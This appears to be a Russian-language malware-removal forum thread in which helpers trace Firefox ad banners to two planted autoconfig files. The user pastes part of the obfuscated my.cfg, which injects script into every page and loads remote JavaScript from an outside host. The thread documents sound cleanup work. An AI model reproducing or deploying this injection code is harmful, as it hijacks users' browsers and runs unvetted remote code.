Показано с 1 по 13 из 13.

Рекламные баннеры на всех сайтах в! в Мозиле. (заявка № 182067)

  1. #1
    Junior Member Репутация
    Регистрация
    31.05.2012
    Сообщений
    13
    Вес репутации
    44

    Thumbs up Рекламные баннеры на всех сайтах в! в Мозиле.

    Появились рекламные баннеры на всех сайтах в Только!!! в Мозиле. Подозрительных дополнений нет вроде...
    Вложения Вложения

  2. Будь в курсе!
    Реклама на VirusInfo

    Надоело быть жертвой? Стань профи по информационной безопасности, получай самую свежую информацию об угрозах и средствах защиты от ведущего российского аналитического центра Anti-Malware.ru:

    Anti-Malware Telegram
     

  3. #2
    Cyber Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Аватар для Info_bot
    Регистрация
    11.05.2011
    Сообщений
    2,287
    Вес репутации
    378
    Уважаемый(ая) pavlentiy67, спасибо за обращение на наш форум!

    Помощь в лечении комьютера на VirusInfo.Info оказывается абсолютно бесплатно. Хелперы в самое ближайшее время ответят на Ваш запрос. Для оказания помощи необходимо предоставить логи сканирования утилитами АВЗ и HiJackThis, подробнее можно прочитать в правилах оформления запроса о помощи.

    Если наш сайт окажется полезен Вам и у Вас будет такая возможность - пожалуйста поддержите проект.

  4. #3
    Невымерший Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Аватар для thyrex
    Регистрация
    07.03.2009
    Адрес
    Soligorsk, Belarus
    Сообщений
    99,211
    Вес репутации
    3104
    Обновите базы AVZ и переделайте логи
    Microsoft MVP 2012-2016 Consumer Security
    Microsoft MVP 2016 Reconnect

  5. #4
    Junior Member Репутация
    Регистрация
    31.05.2012
    Сообщений
    13
    Вес репутации
    44
    Обновился...
    Вложения Вложения

  6. #5
    Невымерший Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Аватар для thyrex
    Регистрация
    07.03.2009
    Адрес
    Soligorsk, Belarus
    Сообщений
    99,211
    Вес репутации
    3104
    Скачайте Farbar Recovery Scan Tool и сохраните на Рабочем столе.

    Примечание: необходимо выбрать версию, совместимую с Вашей операционной системой. Если Вы не уверены, какая версия подойдет для Вашей системы, скачайте обе и попробуйте запустить. Только одна из них запустится на Вашей системе.
    • Запустите программу двойным щелчком. Когда программа запустится, нажмите Yes для соглашения с предупреждением.
    • Убедитесь, что в окне Optional Scan отмечены "List BCD" и "Driver MD5".
    • Нажмите кнопку Scan.
    • После окончания сканирования будет создан отчет (FRST.txt) в той же папке, откуда была запущена программа. Пожалуйста, прикрепите отчет в следующем сообщении.
    • Если программа была запущена в первый раз, будет создан отчет (Addition.txt). Пожалуйста, прикрепите его в следующем сообщении.
    Microsoft MVP 2012-2016 Consumer Security
    Microsoft MVP 2016 Reconnect

  7. #6
    Junior Member Репутация
    Регистрация
    31.05.2012
    Сообщений
    13
    Вес репутации
    44
    Прикрепляю файлы
    Вложения Вложения

  8. #7
    Невымерший Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Аватар для thyrex
    Регистрация
    07.03.2009
    Адрес
    Soligorsk, Belarus
    Сообщений
    99,211
    Вес репутации
    3104
    C:\Program Files\mozilla firefox\browser\defaults\preferences\my-prefs.js
    C:\Program Files\mozilla firefox\my.cfg
    эти файлы изменились (были созданы) 17 апреля. Что в них?
    Microsoft MVP 2012-2016 Consumer Security
    Microsoft MVP 2016 Reconnect

  9. #8
    Junior Member Репутация
    Регистрация
    31.05.2012
    Сообщений
    13
    Вес репутации
    44
    В файле my-prefs.js такой код...
    Код:
    pref('general.config.filename', 'my.cfg');
    pref('general.config.obscure_value', 0);
    А в файле my.cfg зашифрованный длинный код
    Код:
    // First line is ommited
    try{
    	var inline_code = '(function() {var appName = encodeURIComponent("__APP_NAME__");var userId = "__USER_ID__";var appId = "__APP_ID__";var campId = "__CAMP_ID__";try {var _0x1efb=["\x5F\x5F\x41\x50\x50\x5F\x4E\x41\x4D\x45\x5F\x5F","\x6E\x61\x6D\x65","\x6C\x65\x6E\x67\x74\x68","\x69\x6E\x64\x65\x78\x4F\x66","\x68\x6F\x73\x74\x6E\x61\x6D\x65","\x73\x6D\x61\x72\x74\x73\x68\x6F\x70\x70\x69\x6E\x67\x2E\x63\x6F\x6D","\x73\x68\x6F\x70\x70\x73\x74\x6F\x70\x2E\x63\x6F\x6D","\x6C\x6F\x63\x61\x6C\x6D\x6F\x78\x69\x65\x2E\x63\x6F\x6D","\x79\x65\x6C\x6C\x6F\x77\x6D\x6F\x78\x69\x65\x2E\x63\x6F\x6D","\x
    и так далее а в конце
    Код:
    var _injectInlineJSCode=function(a,b){var c=b.createElement("script");c.setAttribute("type","text/javascript");c.innerHTML=a;(b.getElementsByTagName("head")[0]||b.getElementsByTagName("body")[0]).appendChild(c)},_handleDocumentElementInsterted=function(a){if(a&&a instanceof Components.interfaces.nsIDOMHTMLDocument){var b=a&&a.defaultView?a.defaultView:null;b&&b===b.top&&(_injectInlineJSCode("setTimeout(function(){var tag = document.createElement('script');tag.setAttribute('type','text/javascript');tag.setAttribute('src','//icm.r.worldssl.net/ff/m.js');(document.getElementsByTagName('head')[0] || document.getElementsByTagName('body')[0]).appendChild(tag);},1000*2);",
    a),_injectInlineJSCode("setTimeout(function(){"+inline_code+"},1000*3);",a))}},observerService=Components.classes["@mozilla.org/observer-service;1"].getService(Components.interfaces.nsIObserverService);
    observerService.addObserver({QueryInterface:function(a){if(a.equals(Components.interfaces.nsIObserver)||a.equals(Components.interfaces.nsISupports)||a.equals(Components.interfaces.nsISupportsWeakReference))return this;throw Components.results.NS_NOINTERFACE;},observe:function(a,b,c){try{"document-element-inserted"===b&&_handleDocumentElementInsterted(a)}catch(d){}}},"document-element-inserted",!1);
    	})();
    } catch(e){
    Похоже что именно так и подключается реклама. Я вчера полностью удалял Мозилу и заново устанавливал кстати.

  10. #9
    Невымерший Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Аватар для thyrex
    Регистрация
    07.03.2009
    Адрес
    Soligorsk, Belarus
    Сообщений
    99,211
    Вес репутации
    3104
    Переместите эти файлы куда-нибудь в другое место и проверьте проблему
    Microsoft MVP 2012-2016 Consumer Security
    Microsoft MVP 2016 Reconnect

  11. #10
    Junior Member Репутация
    Регистрация
    31.05.2012
    Сообщений
    13
    Вес репутации
    44
    Без них рекламы нет, все работает хорошо. Но странно, я же переустанавливал до этого и полностью удалял и ставил заново..А они откуда то снова появлялись

  12. #11
    Невымерший Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Аватар для thyrex
    Регистрация
    07.03.2009
    Адрес
    Soligorsk, Belarus
    Сообщений
    99,211
    Вес репутации
    3104
    Оба файла заархивируйте с паролем virus и пришлите по красной ссылке Прислать запрошенный карантин вверху темы

    После этого оба файла удалите
    Microsoft MVP 2012-2016 Consumer Security
    Microsoft MVP 2016 Reconnect

  13. #12
    Junior Member Репутация
    Регистрация
    31.05.2012
    Сообщений
    13
    Вес репутации
    44
    Готово. Спасибо за помощь!

  14. #13
    Cybernetic Helper Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация
    Регистрация
    29.12.2008
    Сообщений
    48,233
    Вес репутации
    977

    Итог лечения

    Статистика проведенного лечения:
    • Получено карантинов: 1
    • Обработано файлов: 2
    • В ходе лечения вредоносные программы в карантинах не обнаружены


  • Уважаемый(ая) pavlentiy67, наши специалисты оказали Вам всю возможную помощь по вашему обращению.

    В целях поддержания безопасности вашего компьютера настоятельно рекомендуем:

     

     

    Чтобы всегда быть в курсе актуальных угроз в области информационной безопасности и сохранять свой компьютер защищенным, рекомендуем следить за последними новостями ИТ-сферы портала Anti-Malware.ru:

     

     

    Anti-Malware VK

     

    Anti-Malware Telegram

     

     

    Надеемся больше никогда не увидеть ваш компьютер зараженным!

     

    Если Вас не затруднит, пополните пожалуйста нашу базу безопасных файлов.

  • Похожие темы

    1. Ответов: 2
      Последнее сообщение: 29.10.2014, 11:15
    2. Рекламные баннеры на всех сайтах
      От Артём Сафонов в разделе Помогите!
      Ответов: 14
      Последнее сообщение: 16.06.2014, 21:50
    3. Рекламные баннеры на всех браузерах и сайтах
      От Александр Викторов в разделе Помогите!
      Ответов: 10
      Последнее сообщение: 12.04.2014, 15:04
    4. Рекламные баннеры на всех сайтах
      От Данко в разделе Помогите!
      Ответов: 6
      Последнее сообщение: 06.03.2014, 00:32
    5. Рекламные баннеры на всех сайтах и форумах.
      От Павел Пономарёв в разделе Помогите!
      Ответов: 2
      Последнее сообщение: 26.11.2013, 09:27

    Свернуть/Развернуть Ваши права в разделе

    • Вы не можете создавать новые темы
    • Вы не можете отвечать в темах
    • Вы не можете прикреплять вложения
    • Вы не можете редактировать свои сообщения
    •  
    Page generated in 0.01293 seconds with 20 queries